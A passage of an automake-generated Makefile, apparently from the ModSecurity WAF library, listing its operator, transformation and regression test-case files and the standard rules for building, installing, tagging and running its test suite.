test/test-cases/secrules-language-tests/operators/detectXSS.json \ test/test-cases/secrules-language-tests/operators/endsWith.json \ test/test-cases/secrules-language-tests/operators/eq.json \ test/test-cases/secrules-language-tests/operators/ge.json \ test/test-cases/secrules-language-tests/operators/geoLookup.json \ test/test-cases/secrules-language-tests/operators/gt.json \ test/test-cases/secrules-language-tests/operators/ipMatch.json \ test/test-cases/secrules-language-tests/operators/le.json \ test/test-cases/secrules-language-tests/operators/lt.json \ test/test-cases/secrules-language-tests/operators/noMatch.json \ test/test-cases/secrules-language-tests/operators/pmFromFile.json \ test/test-cases/secrules-language-tests/operators/pm.json \ test/test-cases/secrules-language-tests/operators/rx.json \ test/test-cases/secrules-language-tests/operators/streq.json \ test/test-cases/secrules-language-tests/operators/strmatch.json \ test/test-cases/secrules-language-tests/operators/unconditionalMatch.json \ test/test-cases/secrules-language-tests/operators/validateByteRange.json \ test/test-cases/secrules-language-tests/operators/validateUrlEncoding.json \ test/test-cases/secrules-language-tests/operators/validateUtf8Encoding.json \ test/test-cases/secrules-language-tests/operators/verifyCC.json \ test/test-cases/secrules-language-tests/operators/verifycpf.json \ test/test-cases/secrules-language-tests/operators/verifyssn.json \ test/test-cases/secrules-language-tests/operators/verifysvnr.json \ test/test-cases/secrules-language-tests/operators/within.json \ test/test-cases/secrules-language-tests/transformations/base64DecodeExt.json \ test/test-cases/secrules-language-tests/transformations/base64Decode.json \ test/test-cases/secrules-language-tests/transformations/base64Encode.json \ test/test-cases/secrules-language-tests/transformations/cmdLine.json \ test/test-cases/secrules-language-tests/transformations/compressWhitespace.json \ test/test-cases/secrules-language-tests/transformations/cssDecode.json \ test/test-cases/secrules-language-tests/transformations/escapeSeqDecode.json \ test/test-cases/secrules-language-tests/transformations/hexDecode.json \ test/test-cases/secrules-language-tests/transformations/hexEncode.json \ test/test-cases/secrules-language-tests/transformations/htmlEntityDecode.json \ test/test-cases/secrules-language-tests/transformations/jsDecode.json \ test/test-cases/secrules-language-tests/transformations/length.json \ test/test-cases/secrules-language-tests/transformations/lowercase.json \ test/test-cases/secrules-language-tests/transformations/md5.json \ test/test-cases/secrules-language-tests/transformations/normalisePath.json \ test/test-cases/secrules-language-tests/transformations/normalisePathWin.json \ test/test-cases/secrules-language-tests/transformations/parityEven7bit.json \ test/test-cases/secrules-language-tests/transformations/parityOdd7bit.json \ test/test-cases/secrules-language-tests/transformations/parityZero7bit.json \ test/test-cases/secrules-language-tests/transformations/removeCommentsChar.json \ test/test-cases/secrules-language-tests/transformations/removeComments.json \ test/test-cases/secrules-language-tests/transformations/removeNulls.json \ test/test-cases/secrules-language-tests/transformations/removeWhitespace.json \ test/test-cases/secrules-language-tests/transformations/replaceComments.json \ test/test-cases/secrules-language-tests/transformations/replaceNulls.json \ test/test-cases/secrules-language-tests/transformations/sha1.json \ test/test-cases/secrules-language-tests/transformations/sqlHexDecode.json \ test/test-cases/secrules-language-tests/transformations/trim.json \ test/test-cases/secrules-language-tests/transformations/trimLeft.json \ test/test-cases/secrules-language-tests/transformations/trimRight.json \ test/test-cases/secrules-language-tests/transformations/urlDecode.json \ test/test-cases/secrules-language-tests/transformations/urlDecodeUni.json \ test/test-cases/secrules-language-tests/transformations/urlEncode.json \ test/test-cases/secrules-language-tests/transformations/utf8toUnicode.json pkgconfigdir = $(libdir)/pkgconfig pkgconfig_DATA = modsecurity.pc EXTRA_DIST = modsecurity.pc.in \ modsecurity.conf-recommended \ unicode.mapping all: all-recursive .SUFFIXES: .SUFFIXES: .log .test .test$(EXEEXT) .trs am--refresh: Makefile @: $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ echo ' cd $(srcdir) && $(AUTOMAKE) --foreign'; \ $(am__cd) $(srcdir) && $(AUTOMAKE) --foreign \ && exit 0; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ echo ' $(SHELL) ./config.status'; \ $(SHELL) ./config.status;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) $(SHELL) ./config.status --recheck $(top_srcdir)/configure: $(am__configure_deps) $(am__cd) $(srcdir) && $(AUTOCONF) $(ACLOCAL_M4): $(am__aclocal_m4_deps) $(am__cd) $(srcdir) && $(ACLOCAL) $(ACLOCAL_AMFLAGS) $(am__aclocal_m4_deps): modsecurity.pc: $(top_builddir)/config.status $(srcdir)/modsecurity.pc.in cd $(top_builddir) && $(SHELL) ./config.status $@ mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs distclean-libtool: -rm -f libtool config.lt install-pkgconfigDATA: $(pkgconfig_DATA) @$(NORMAL_INSTALL) @list='$(pkgconfig_DATA)'; test -n "$(pkgconfigdir)" || list=; \ if test -n "$$list"; then \ echo " $(MKDIR_P) '$(DESTDIR)$(pkgconfigdir)'"; \ $(MKDIR_P) "$(DESTDIR)$(pkgconfigdir)" || exit 1; \ fi; \ for p in $$list; do \ if test -f "$$p"; then d=; else d="$(srcdir)/"; fi; \ echo "$$d$$p"; \ done | $(am__base_list) | \ while read files; do \ echo " $(INSTALL_DATA) $$files '$(DESTDIR)$(pkgconfigdir)'"; \ $(INSTALL_DATA) $$files "$(DESTDIR)$(pkgconfigdir)" || exit $$?; \ done uninstall-pkgconfigDATA: @$(NORMAL_UNINSTALL) @list='$(pkgconfig_DATA)'; test -n "$(pkgconfigdir)" || list=; \ files=`for p in $$list; do echo $$p; done | sed -e 's|^.*/||'`; \ dir='$(DESTDIR)$(pkgconfigdir)'; $(am__uninstall_files_from_dir) # This directory's subdirectories are mostly independent; you can cd # into them and run 'make' without going through this Makefile. # To change the values of 'make' variables: instead of editing Makefiles, # (1) if the variable is set in 'config.status', edit 'config.status' # (which will cause the Makefiles to be regenerated when you run 'make'); # (2) otherwise, pass the desired values on the 'make' command line. $(am__recursive_targets): @fail=; \ if $(am__make_keepgoing); then \ failcom='fail=yes'; \ else \ failcom='exit 1'; \ fi; \ dot_seen=no; \ target=`echo $@ | sed s/-recursive//`; \ case "$@" in \ distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ *) list='$(SUBDIRS)' ;; \ esac; \ for subdir in $$list; do \ echo "Making $$target in $$subdir"; \ if test "$$subdir" = "."; then \ dot_seen=yes; \ local_target="$$target-am"; \ else \ local_target="$$target"; \ fi; \ ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ || eval $$failcom; \ done; \ if test "$$dot_seen" = "no"; then \ $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ fi; test -z "$$fail" ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-recursive TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \ include_option=--etags-include; \ empty_fix=.; \ else \ include_option=--include; \ empty_fix=; \ fi; \ list='$(SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ test ! -f $$subdir/TAGS || \ set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \ fi; \ done; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-recursive CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscope: cscope.files test ! -s cscope.files \ || $(CSCOPE) -b -q $(AM_CSCOPEFLAGS) $(CSCOPEFLAGS) -i cscope.files $(CSCOPE_ARGS) clean-cscope: -rm -f cscope.files cscope.files: clean-cscope cscopelist cscopelist: cscopelist-recursive cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags -rm -f cscope.out cscope.in.out cscope.po.out cscope.files # Recover from deleted '.trs' file; this should ensure that # "rm -f foo.log; make foo.trs" re-run 'foo.test', and re-create # both 'foo.log' and 'foo.trs'. Break the recipe in two subshells # to avoid problems with "make -n". .log.trs: rm -f $< $@ $(MAKE) $(AM_MAKEFLAGS) $< # Leading 'am--fnord' is there to ensure the list of targets does not # expand to empty, as could happen e.g. with make check TESTS=''. am--fnord $(TEST_LOGS) $(TEST_LOGS:.log=.trs): $(am__force_recheck) am--force-recheck: @: $(TEST_SUITE_LOG): $(TEST_LOGS) @$(am__set_TESTS_bases); \ am__f_ok () { test -f "$$1" && test -r "$$1"; }; \ redo_bases=`for i in $$bases; do \ am__f_ok $$i.trs && am__f_ok $$i.log || echo $$i; \ done`; \ if test -n "$$redo_bases"; then \ redo_logs=`for i in $$redo_bases; do echo $$i.log; done`; \ redo_results=`for i in $$redo_bases; do echo $$i.trs; done`; \ if $(am__make_dryrun); then :; else \ rm -f $$redo_logs && rm -f $$redo_results || exit 1; \ fi; \ fi; \ if test -n "$$am__remaking_logs"; then \ echo "fatal: making $(TEST_SUITE_LOG): possible infinite" \ "recursion detected" >&2; \ elif test -n "$$redo_logs"; then \ am__remaking_logs=yes $(MAKE) $(AM_MAKEFLAGS) $$redo_logs; \ fi; \ if $(am__make_dryrun); then :; else \ st=0; \ errmsg="fatal: making $(TEST_SUITE_LOG): failed to create"; \ for i in $$redo_bases; do \ test -f $$i.trs && test -r $$i.trs \ || { echo "$$errmsg $$i.trs" >&2; st=1; }; \ test -f $$i.log && test -r $$i.log \ || { echo "$$errmsg $$i.log" >&2; st=1; }; \ done; \ test $$st -eq 0 || exit 1; \ fi @$(am__sh_e_setup); $(am__tty_colors); $(am__set_TESTS_bases); \ ws='[ ]'; \ results=`for b in $$bases; do echo $$b.trs; done`; \ test -n "$$results" || results=/dev/null; \ all=` grep "^$$ws*:test-result:" $$results | wc -l`; \ pass=` grep "^$$ws*:test-result:$$ws*PASS" $$results | wc -l`; \ fail=` grep "^$$ws*:test-result:$$ws*FAIL" $$results | wc -l`; \ skip=` grep "^$$ws*:test-result:$$ws*SKIP" $$results | wc -l`; \ xfail=`grep "^$$ws*:test-result:$$ws*XFAIL" $$results | wc -l`; \ xpass=`grep "^$$ws*:test-result:$$ws*XPASS" $$results | wc -l`; \ error=`grep "^$$ws*:test-result:$$ws*ERROR" $$results | wc -l`; \ if test `expr $$fail + $$xpass + $$error` -eq 0; then \ success=true; \ else \ success=false; \ fi; \ br='==================='; br=$$br$$br$$br$$br; \ result_count () \ { \ if test x"$$1" = x"--maybe-color"; then \ maybe_colorize=yes; \ elif test x"$$1" = x"--no-color"; then \ maybe_colorize=no; \ else \ echo "$@: invalid 'result_count' usage" >&2; exit 4; \ fi; \ shift; \ desc=$$1 count=$$2; \ if test $$maybe_colorize = yes && test $$count -gt 0; then \ color_start=$$3 color_end=$$std; \ else \ color_start= color_end=; \ fi; \ echo "$${color_start}# $$desc $$count$${color_end}"; \ }; \ create_testsuite_report () \ { \ result_count $$1 "TOTAL:" $$all "$$brg"; \ result_count $$1 "PASS: " $$pass "$$grn"; \ result_count $$1 "SKIP: " $$skip "$$blu"; \ result_count $$1 "XFAIL:" $$xfail "$$lgn"; \ result_count $$1 "FAIL: " $$fail "$$red"; \ result_count $$1 "XPASS:" $$xpass "$$red"; \ result_count $$1 "ERROR:" $$error "$$mgn"; \ }; \ { \ echo "$(PACKAGE_STRING): $(subdir)/$(TEST_SUITE_LOG)" | \ $(am__rst_title); \ create_testsuite_report --no-color; \ echo; \ echo ".. contents:: :depth: 2"; \ echo; \ for b in $$bases; do echo $$b; done \ | $(am__create_global_log); \ } >$(TEST_SUITE_LOG).tmp || exit 1; \ mv $(TEST_SUITE_LOG).tmp $(TEST_SUITE_LOG); \ if $$success; then \ col="$$grn"; \ else \ col="$$red"; \ test x"$$VERBOSE" = x || cat $(TEST_SUITE_LOG); \ fi; \ echo "$${col}$$br$${std}"; \ echo "$${col}Testsuite summary for $(PACKAGE_STRING)$${std}"; \ echo "$${col}$$br$${std}"; \ create_testsuite_report --maybe-color; \ echo "$$col$$br$$std"; \ if $$success; then :; else \ echo "$${col}See $(subdir)/$(TEST_SUITE_LOG)$${std}"; \ if test -n "$(PACKAGE_BUGREPORT)"; then \ echo "$${col}Please report to $(PACKAGE_BUGREPORT)$${std}"; \ fi; \ echo "$$col$$br$$std"; \ fi; \ $$success || exit 1 check-TESTS: @list='$(RECHECK_LOGS)'; test -z "$$list" || rm -f $$list @list='$(RECHECK_LOGS:.log=.trs)'; test -z "$$list" || rm -f $$list @test -z "$(TEST_SUITE_LOG)" || rm -f $(TEST_SUITE_LOG) @set +e; $(am__set_TESTS_bases); \ log_list=`for i in $$bases; do echo $$i.log; done`; \ trs_list=`for i in $$bases; do echo $$i.trs; done`; \ log_list=`echo $$log_list`; trs_list=`echo $$trs_list`; \ $(MAKE) $(AM_MAKEFLAGS) $(TEST_SUITE_LOG) TEST_LOGS="$$log_list"; \ exit $$?; recheck: all @test -z "$(TEST_SUITE_LOG)" || rm -f $(TEST_SUITE_LOG) @set +e; $(am__set_TESTS_bases); \ bases=`for i in $$bases; do echo $$i; done \ | $(am__list_recheck_tests)` || exit 1; \ log_list=`for i in $$bases; do echo $$i.log; done`; \ log_list=`echo $$log_list`; \ $(MAKE) $(AM_MAKEFLAGS) $(TEST_SUITE_LOG) \ am__force_recheck=am--force-recheck \ TEST_LOGS="$$log_list"; \ exit $$? test/test-cases/regression/action-allow.json.log: test/test-cases/regression/action-allow.json @p='test/test-cases/regression/action-allow.json'; \ b='test/test-cases/regression/action-allow.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-block.json.log: test/test-cases/regression/action-block.json @p='test/test-cases/regression/action-block.json'; \ b='test/test-cases/regression/action-block.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_request_body_access.json.log: test/test-cases/regression/action-ctl_request_body_access.json @p='test/test-cases/regression/action-ctl_request_body_access.json'; \ b='test/test-cases/regression/action-ctl_request_body_access.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_request_body_processor.json.log: test/test-cases/regression/action-ctl_request_body_processor.json @p='test/test-cases/regression/action-ctl_request_body_processor.json'; \ b='test/test-cases/regression/action-ctl_request_body_processor.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json.log: test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json @p='test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json'; \ b='test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_rule_engine.json.log: test/test-cases/regression/action-ctl_rule_engine.json @p='test/test-cases/regression/action-ctl_rule_engine.json'; \ b='test/test-cases/regression/action-ctl_rule_engine.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_rule_remove_by_id.json.log: test/test-cases/regression/action-ctl_rule_remove_by_id.json @p='test/test-cases/regression/action-ctl_rule_remove_by_id.json'; \ b='test/test-cases/regression/action-ctl_rule_remove_by_id.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_rule_remove_by_tag.json.log: test/test-cases/regression/action-ctl_rule_remove_by_tag.json @p='test/test-cases/regression/action-ctl_rule_remove_by_tag.json'; \ b='test/test-cases/regression/action-ctl_rule_remove_by_tag.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_rule_remove_target_by_id.json.log: test/test-cases/regression/action-ctl_rule_remove_target_by_id.json @p='test/test-cases/regression/action-ctl_rule_remove_target_by_id.json'; \ b='test/test-cases/regression/action-ctl_rule_remove_target_by_id.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json.log: test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json @p='test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json'; \ b='test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-disruptive.json.log: test/test-cases/regression/action-disruptive.json @p='test/test-cases/regression/action-disruptive.json'; \ b='test/test-cases/regression/action-disruptive.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-exec.json.log: test/test-cases/regression/action-exec.json @p='test/test-cases/regression/action-exec.json'; \ b='test/test-cases/regression/action-exec.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-id.json.log: test/test-cases/regression/action-id.json @p='test/test-cases/regression/action-id.json'; \ b='test/test-cases/regression/action-id.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-initcol.json.log: test/test-cases/regression/action-initcol.json @p='test/test-cases/regression/action-initcol.json'; \ b='test/test-cases/regression/action-initcol.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-msg.json.log: test/test-cases/regression/action-msg.json @p='test/test-cases/regression/action-msg.json'; \ b='test/test-cases/regression/action-msg.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-setenv.json.log: test/test-cases/regression/action-setenv.json @p='test/test-cases/regression/action-setenv.json'; \ b='test/test-cases/regression/action-setenv.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-setrsc.json.log: test/test-cases/regression/action-setrsc.json @p='test/test-cases/regression/action-setrsc.json'; \ b='test/test-cases/regression/action-setrsc.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-setsid.json.log: test/test-cases/regression/action-setsid.json @p='test/test-cases/regression/action-setsid.json'; \ b='test/test-cases/regression/action-setsid.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-setuid.json.log: test/test-cases/regression/action-setuid.json @p='test/test-cases/regression/action-setuid.json'; \ b='test/test-cases/regression/action-setuid.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/actions.json.log: test/test-cases/regression/actions.json @p='test/test-cases/regression/actions.json'; \ b='test/test-cases/regression/actions.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-skip.json.log: test/test-cases/regression/action-skip.json @p='test/test-cases/regression/action-skip.json'; \ b='test/test-cases/regression/action-skip.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-tag.json.log: test/test-cases/regression/action-tag.json @p='test/test-cases/regression/action-tag.json'; \ b='test/test-cases/regression/action-tag.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-tnf-base64.json.log: test/test-cases/regression/action-tnf-base64.json @p='test/test-cases/regression/action-tnf-base64.json'; \ b='test/test-cases/regression/action-tnf-base64.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/action-xmlns.json.log: test/test-cases/regression/action-xmlns.json @p='test/test-cases/regression/action-xmlns.json'; \ b='test/test-cases/regression/action-xmlns.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/auditlog.json.log: test/test-cases/regression/auditlog.json @p='test/test-cases/regression/auditlog.json'; \ b='test/test-cases/regression/auditlog.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/collection-case-insensitive.json.log: test/test-cases/regression/collection-case-insensitive.json @p='test/test-cases/regression/collection-case-insensitive.json'; \ b='test/test-cases/regression/collection-case-insensitive.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/collection-lua.json.log: test/test-cases/regression/collection-lua.json @p='test/test-cases/regression/collection-lua.json'; \ b='test/test-cases/regression/collection-lua.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/collection-regular_expression_selection.json.log: test/test-cases/regression/collection-regular_expression_selection.json @p='test/test-cases/regression/collection-regular_expression_selection.json'; \ b='test/test-cases/regression/collection-regular_expression_selection.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/collection-resource.json.log: test/test-cases/regression/collection-resource.json @p='test/test-cases/regression/collection-resource.json'; \ b='test/test-cases/regression/collection-resource.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/collection-tx.json.log: test/test-cases/regression/collection-tx.json @p='test/test-cases/regression/collection-tx.json'; \ b='test/test-cases/regression/collection-tx.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/collection-tx-with-macro.json.log: test/test-cases/regression/collection-tx-with-macro.json @p='test/test-cases/regression/collection-tx-with-macro.json'; \ b='test/test-cases/regression/collection-tx-with-macro.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-body_limits.json.log: test/test-cases/regression/config-body_limits.json 